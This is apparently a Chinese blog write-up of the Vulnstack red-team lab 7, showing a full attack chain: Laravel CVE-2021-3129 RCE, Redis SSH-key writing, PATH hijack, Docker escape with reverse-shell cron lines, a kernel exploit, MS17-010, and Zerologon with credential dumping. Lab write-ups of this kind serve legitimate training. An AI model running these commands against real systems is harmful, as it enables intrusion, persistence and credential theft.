<!DOCTYPE html>


<html lang="zh-Hans">


<head>
  <meta charset="utf-8" />
    
  <meta name="description" content="敢问路在何方" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    Vulnstack内网渗透（七） |  回梦&#39;s Blog
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  <link rel="shortcut icon" href="/favicon.ico" />
  
  
<link rel="stylesheet" href="/dist/main.css">

  <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">
  
<link rel="stylesheet" href="/css/custom.css">

  
  <script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>
  
  

  

</head>

</html>

<body>
  <div id="app">
    
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-Vulnstack内网渗透（七）"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  Vulnstack内网渗透（七）
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/" class="article-date">
  <time datetime="2021-05-14T09:37:43.000Z" itemprop="datePublished">2021-05-14</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">2.8k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">11 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>这个靶场是红日的ATT&amp;CK实战系列-红队评估（七）</p>
<p>链接如下：<a target="_blank" rel="noopener" href="http://vulnstack.qiyuanxuetang.net/vuln/detail/9/">http://vulnstack.qiyuanxuetang.net/vuln/detail/9/</a></p>
<p>这个靶场兜兜转转弄了挺多次，大佬轻喷~~</p>
<p>攻击图如下：</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/1.png"></p>
<p>由于环境问题，我将DMZ区的ubuntu设置为NAT模式</p>
<p>Web1 IP为192.168.213.188</p>
<p>Kali IP：192.168.213.170</p>
<p><strong>环境信息</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">DMZ区的 Ubuntu 需要启动redis和nginx服务：</span><br><span class="line"></span><br><span class="line">sudo redis-server &#x2F;etc&#x2F;redis.conf</span><br><span class="line"></span><br><span class="line">sudo &#x2F;usr&#x2F;sbin&#x2F;nginx -c &#x2F;etc&#x2F;nginx&#x2F;nginx.conf</span><br><span class="line"></span><br><span class="line">sudo iptables -F</span><br><span class="line"></span><br><span class="line">第二层网络的 Ubuntu需要启动docker容器：</span><br><span class="line"></span><br><span class="line">sudo service docker start</span><br><span class="line"></span><br><span class="line">sudo docker start 8e172820ac78</span><br><span class="line"></span><br><span class="line">第三层网络的 Windows 7 （PC 1）需要启动通达OA：</span><br><span class="line"></span><br><span class="line">C:\MYOA\bin\AutoConfig.exe</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">域用户信息</span><br><span class="line">域用户账户和密码如下：</span><br><span class="line"></span><br><span class="line">Administrator：Whoami2021</span><br><span class="line"></span><br><span class="line">whoami：Whoami2021</span><br><span class="line"></span><br><span class="line">bunny：Bunny2021</span><br><span class="line"></span><br><span class="line">moretz：Moretz2021</span><br><span class="line"></span><br><span class="line">Ubuntu 1：</span><br><span class="line"></span><br><span class="line">web：web2021</span><br><span class="line"></span><br><span class="line">Ubuntu 2：</span><br><span class="line"></span><br><span class="line">ubuntu：ubuntu</span><br><span class="line"></span><br><span class="line">通达OA账户：</span><br><span class="line"></span><br><span class="line">admin：admin657260</span><br></pre></td></tr></table></figure>
<h1 id="外网渗透"><a href="#外网渗透" class="headerlink" title="外网渗透"></a>外网渗透</h1><h2 id="Laravel-Debug-mode-RCE（CVE-2021-3129）"><a href="#Laravel-Debug-mode-RCE（CVE-2021-3129）" class="headerlink" title="Laravel Debug mode RCE（CVE-2021-3129）"></a>Laravel Debug mode RCE（CVE-2021-3129）</h2><p>首先拿到一个IP地址：192.168.213.188</p>
<p>第一步当然是先进行端口扫描啦！</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/2.png"></p>
<p>开放22，80，81，6379端口</p>
<p>访问80端口发现是一个博客网站，暂时没啥思路</p>
<p>访问81端口发现是Laravel框架且版本是Laravel v8.29.0 (PHP v7.4.14)</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/3.png"></p>
<p>恰好这个框架爆了一个远程代码执行漏洞，我这里直接使用工具进行Getshell</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/4.png"></p>
<p>连接成功</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/5.png"></p>
<p>工具链接：<a target="_blank" rel="noopener" href="https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP">https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP</a></p>
<p>简单进行了信息收集，发现是一个docker环境，ip是172段</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">hostname</span><br><span class="line">cat &#x2F;etc&#x2F;hosts</span><br><span class="line">cat &#x2F;proc&#x2F;1&#x2F;cgroup</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/6.png"></p>
<p>尝试反弹shell到Kali上再进行提权</p>
<p>Kali进行监听，但是最后没有反应</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/7.png"></p>
<p>尝试了MSF的tcp、http均不行，故判断为不出网</p>
<h2 id="Redis未授权"><a href="#Redis未授权" class="headerlink" title="Redis未授权"></a>Redis未授权</h2><p>既然反弹不了shell，只能从其他地方进行入手看看 了</p>
<p>之前进行端口扫描时发现该机器开着6379，尝试Redis弱口令或未授权访问</p>
<p>尝试进行连接Redis，连接成功，存在未授权访问</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/8.png"></p>
<p>尝试写入SSH公钥</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -t rsa #生成公钥</span><br><span class="line">(echo -e &quot;\n\n&quot;; cat &#x2F;root&#x2F;.ssh&#x2F;id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; foo.txt #将公钥导入foo.txt文件</span><br><span class="line">cat foo.txt | redis-cli -h 192.168.213.170 -p 6379 -x set hello #把foo.txt文件内容写入目标主机的redis缓冲中</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/9.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">config set dir &#x2F;root&#x2F;.ssh    # 设置redis的备份路径为&#x2F;root&#x2F;.ssh&#x2F;</span><br><span class="line">config set dbfilename authorized_keys    # 设置保存文件名为authorized_keys</span><br><span class="line">save    # 将数据保存在目标服务器硬盘上</span><br><span class="line">ssh 192.168.213.188 # 连接</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/10.png"></p>
<p>成功进行连接，简单进行了信息收集，发现存在52段</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/12.png"></p>
<p>因为之前的shell反弹不了，所以看一下nginx的配置文件是不是做了反向代理</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/11.png"></p>
<p>81端口的反弹不到kali，只能麻烦一点使用ubuntu做为跳板机进行操作</p>
<p>首先进行反弹shell到ubuntu:192.168.52.10</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/13.png"></p>
<p>当前权限为www，So，先进行提权</p>
<h2 id="环境变量提权"><a href="#环境变量提权" class="headerlink" title="环境变量提权"></a>环境变量提权</h2><p>不知道是不是因为docker环境的原因，尝试内核提权失败</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/14.png"></p>
<p>既然如此，就尝试搜索寻找带有SUID的文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">find &#x2F; -perm -u&#x3D;s -type f 2&gt;&#x2F;dev&#x2F;null</span><br><span class="line">find &#x2F; -user root -perm -4000 -print 2&gt;&#x2F;dev&#x2F;null</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/15.png"></p>
<p>发现home目录下的那个shell有点可疑，先执行看看会发生什么~</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/16.png"></p>
<p>通过执行发现该脚本执行了PS命令且并未使用绝对路径，源码在demo.c中可以清楚看到</p>
<p>那么我们尝试更改$PATH来执行我们的恶意程序，从而获得目标主机的高权限shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">cd &#x2F;tmp</span><br><span class="line">echo &quot;&#x2F;bin&#x2F;bash&quot; &gt; ps</span><br><span class="line">chmod 777 ps</span><br><span class="line">echo $PATH </span><br><span class="line">export PATH&#x3D;&#x2F;tmp:$PATH # 将&#x2F;tmp添加到环境变量中，并且先加载执行&#x2F;tmp里的程序</span><br><span class="line">cd &#x2F;home&#x2F;jobs</span><br><span class="line">.&#x2F;shell</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/17.png"></p>
<p>成功获得root权限，把shell再反弹到ubuntu(web 1)中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">bash -c &#39;exec bash -i &amp;&gt;&#x2F;dev&#x2F;tcp&#x2F;192.168.52.10&#x2F;1239 &lt;&amp;1&#39;</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/18.png"></p>
<p>前面说到这是个docker环境，实际IP为192.168.52.20，所以我们要进行docker逃逸</p>
<p>刚开始尝试的是CVE-2019-5736 runc容器逃逸漏洞，在运行./main并在Web 2进入docker环境，但ubuntu监听处没有任何反应，只好作罢，尝试另外一种逃逸方法</p>
<h2 id="特权模式逃逸"><a href="#特权模式逃逸" class="headerlink" title="特权模式逃逸"></a>特权模式逃逸</h2><h3 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h3><p>使用特权模式启动容器，可以获取大量设备文件访问权限。因为当管理员执行docker run —privileged时，Docker容器将被允许访问主机上的所有设备，并可以执行mount命令进行挂载</p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">fdisk -l #查看磁盘文件</span><br><span class="line">ls &#x2F;dev #查看设备文件</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/19.png"></p>
<p>有三个磁盘文件和N个设备文件，我们将/dev/sda1挂载到自己创建的文件夹</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mkdir hello</span><br><span class="line">mount &#x2F;dev&#x2F;sda1 &#x2F;hello</span><br><span class="line">ls &#x2F;hello</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/20.png"></p>
<p>挂载成功，写入计划任务</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo &#39;* * * * * bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;192.168.52.10&#x2F;1233 0&gt;&amp;1&#39; &gt;&gt; &#x2F;hello&#x2F;var&#x2F;spool&#x2F;cron&#x2F;root</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/21.png"></p>
<p>等了好一会，但还是没有反应0.0</p>
<p>换另一个思路，翻一下看看可不可以访问root目录或查看home有没有用户</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/22.png"></p>
<p>可以看到有ubuntu这个用户</p>
<p>接下来就可以将我们自己生成的ssh秘钥写入到/hello/home/ubuntu/.ssh目录中的authorized_keys文件中，写入成功之后就可以使用该密钥进行登陆该机器</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">ssh-keygen -f hello</span><br><span class="line">chmod 600 hello #赋予权限</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/23.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">cp -avx &#x2F;hello&#x2F;home&#x2F;ubuntu&#x2F;.ssh&#x2F;id_rsa.pub &#x2F;hello&#x2F;home&#x2F;ubuntu&#x2F;.ssh&#x2F;authorized_keys #-avx是将权限也一起复制</span><br><span class="line"></span><br><span class="line">echo &gt; &#x2F;hello&#x2F;home&#x2F;ubuntu&#x2F;.ssh&#x2F;authorized_keys #清空authorized_keys文件</span><br><span class="line"></span><br><span class="line">echo &#39;生成的.pub文件的内容&#39; &gt; &#x2F;hello&#x2F;home&#x2F;ubuntu&#x2F;.ssh&#x2F;authorized_keys #将ssh秘钥写入authorized_keys文件</span><br><span class="line"></span><br><span class="line">cat &#x2F;hello&#x2F;home&#x2F;ubuntu&#x2F;.ssh&#x2F;authorized_keys #查看是否写入成功</span><br><span class="line"></span><br><span class="line">ssh -i hello ubuntu@192.168.52.20</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/24.png"></p>
<p>成功登录，查看了一下网络，发现还存在93网段</p>
<h2 id="CVE-2021-3493"><a href="#CVE-2021-3493" class="headerlink" title="CVE-2021-3493"></a>CVE-2021-3493</h2><p>linux kernel一般指Linux内核。Linux是一种开源电脑操作系统内核。它是一个用C语言写成，符合POSIX标准的类Unix操作系统。<br>linux内核中的overlayfs文件系统中没有正确地验证用户名称空间和底层文件系统中文件功能的设置。由于非特权用户名称空间和Ubuntu内核中允许非特权覆盖的补丁的组合，攻击者可以使用它来获得更高的特权。</p>
<p><strong>漏洞影响版本</strong></p>
<p>Ubuntu 20.10<br>Ubuntu 20.04 LTS<br>Ubuntu 18.04 LTS<br>Ubuntu 16.04 LTS<br>Ubuntu 14.04 ESM</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/26.png"></p>
<p>因为登录的是ubuntu用户，刚好今年ubuntu机器出了一个内核提权漏洞，该机器在影响范围内</p>
<p>So，先进行提权</p>
<p>进入到tmp目录</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">vim exploit.c #将下载的exploit.c的内容粘贴到该文件中</span><br><span class="line">gcc exploit.c -o exploit #编译</span><br><span class="line">chmod +x exploit</span><br><span class="line">.&#x2F;exploit</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/25.png"></p>
<p>Exp：<a target="_blank" rel="noopener" href="https://github.com/briskets/CVE-2021-3493">https://github.com/briskets/CVE-2021-3493</a></p>
<p>成功提权，那么接下来该将这两台机器上线MSF继续进攻内网了</p>
<h1 id="内网渗透"><a href="#内网渗透" class="headerlink" title="内网渗透"></a>内网渗透</h1><p>先进行上线通过Redis拿到的机器</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/27.png"></p>
<p>添加路由</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">run get_local_subnets</span><br><span class="line">run autoroute -s 192.168.52.0 -n 255.255.255.0</span><br><span class="line">run autoroute -p</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/28.png"></p>
<p>因为在Web 1这台机器上通过尝试该机器安装有python3.6.9，那么我们可以将木马上传到Web 1，通过python3开启一个http服务，使用Web 2进行下载并运行我们的木马</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/29.png"></p>
<p>首先MSF生成木马，通过MSF上传到Web 1中</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p linux&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp LPORT&#x3D;2020 -f elf -o 20.elf</span><br><span class="line">sessions 1</span><br><span class="line">upload &#x2F;root&#x2F;20.elf &#x2F;tmp&#x2F;20.elf</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/30.png"></p>
<p>成功上线</p>
<h2 id="存活扫描"><a href="#存活扫描" class="headerlink" title="存活扫描"></a>存活扫描</h2><p>先进行扫描52段还有没有其他存活主机</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/65.png"></p>
<p>可以看到并没有其他存活主机</p>
<p>因为Web 2存在一个93网段，所以进行扫描一下93段的存活主机</p>
<p>添加路由后再进行扫描，此步省略…</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/32.png"></p>
<p>在扫着扫着，session突然就掉了，重新上线一下</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/33.png"></p>
<p>发现两台机器且存在域，其中30八九不离十为域控</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">[+] 192.168.93.30 [DC] OS:Windows Names:(DC, WHOAMIANONY) Addresses:(192.168.93.30) Mac:00:0c:29:72:b5:3e Virtual Machine:VMWare</span><br><span class="line">[+] 192.168.93.40 [PC2] OS:Windows Names:(PC2, WHOAMIANONY, __MSBROWSE__) Addresses:(192.168.93.40, 169.254.129.186) Mac:00:0c:29:28:d5:fe Virtual Machine:VMWare</span><br></pre></td></tr></table></figure>
<p>使用SMB_VERSION模块结果也是一样</p>
<h2 id="MS17-010"><a href="#MS17-010" class="headerlink" title="MS17-010"></a>MS17-010</h2><p>进内网必然进行测试的漏洞</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/34.png"></p>
<p>可以看到两台机器均存在ms17010</p>
<p>进行攻击DC上线的时候会话创建失败，但是可以使用命令执行模块进行执行命令</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/35.png"></p>
<p>使用MS17010命令执行模块进行信息收集</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/61.png"></p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/62.png"></p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/63.png"></p>
<p>到此可以确定192.168.93.30确实为域控</p>
<p>域控这个先放一放，看看WIn7机器能不能进行上线</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/39.png"></p>
<p>使用msf的模块进行攻击，但还是失败，换方程式漏洞利用工具进行打</p>
<p>先用MSF生成dll文件</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p windows&#x2F;x64&#x2F;meterpreter&#x2F;bind_tcp LPORT&#x3D;443 -f dll &gt; x64.dll</span><br></pre></td></tr></table></figure>
<p>MSF开启SOCKS代理</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary&#x2F;server&#x2F;socks_proxy</span><br><span class="line">exploit</span><br></pre></td></tr></table></figure>
<p>设置好代理</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/40.png"></p>
<p>将x64.dll放到工具目录替换原来的，MSF设置好监听</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/38.png"></p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/37.png"></p>
<p>Win7成功上线，但是呢域控还是不行</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/41.png"></p>
<p>抓了密码并没有发现域管账号，且运行程序没有是使用域管账号运行的，那么说明域管并未登录过该机器</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/42.png"></p>
<p>先把密码信息用得上的复制出来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">SID: S-1-5-21-1315137663-3706837544-1429009142-1115</span><br><span class="line">hostname: PC2</span><br><span class="line">* Username : moretz</span><br><span class="line">* Domain   : WHOAMIANONY</span><br><span class="line">* Password : Moretz2021</span><br></pre></td></tr></table></figure>
<p>emmm，既然域控可以执行命令，那么上传木马到Win7，使用copy命令进行复制到域控，但是并没有成功</p>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/43.png"></p>
<p>先尝试域内提权漏洞吧</p>
<h2 id="CVE-2020-1472"><a href="#CVE-2020-1472" class="headerlink" title="CVE-2020-1472"></a>CVE-2020-1472</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>攻击者通过NetLogon（MS-NRPC），建立与域控间易受攻击的安全通道时，可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序</p>
<h3 id="检测"><a href="#检测" class="headerlink" title="检测"></a>检测</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">vim &#x2F;etc&#x2F;proxychains.conf #设置代理</span><br><span class="line">proxychains python3 zerologon_tester.py DC 192.168.93.30</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/44.png"></p>
<p>显示success表示漏洞存在</p>
<p>脚本地址：<a target="_blank" rel="noopener" href="https://github.com/SecuraBV/CVE-2020-1472">https://github.com/SecuraBV/CVE-2020-1472</a></p>
<h3 id="漏洞利用-1"><a href="#漏洞利用-1" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p>将域控密码置空</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains python3 cve-2020-1472-exploit.py DC 192.168.93.30</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/45.png"></p>
<p>使用impacket中的工具将域控的密码dump下来</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">proxychains python3 secretsdump.py WHOAMIANONY.ORG&#x2F;DC\$@192.168.93.30 -just-dc -no-pass</span><br></pre></td></tr></table></figure>
<p><img src="/2021/05/14/Vulnstack%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F%EF%BC%88%E4%B8%83%EF%BC%89/46.png"></p>
<p>得到hash之后，使用MSF PSEXEC模块上线</p>
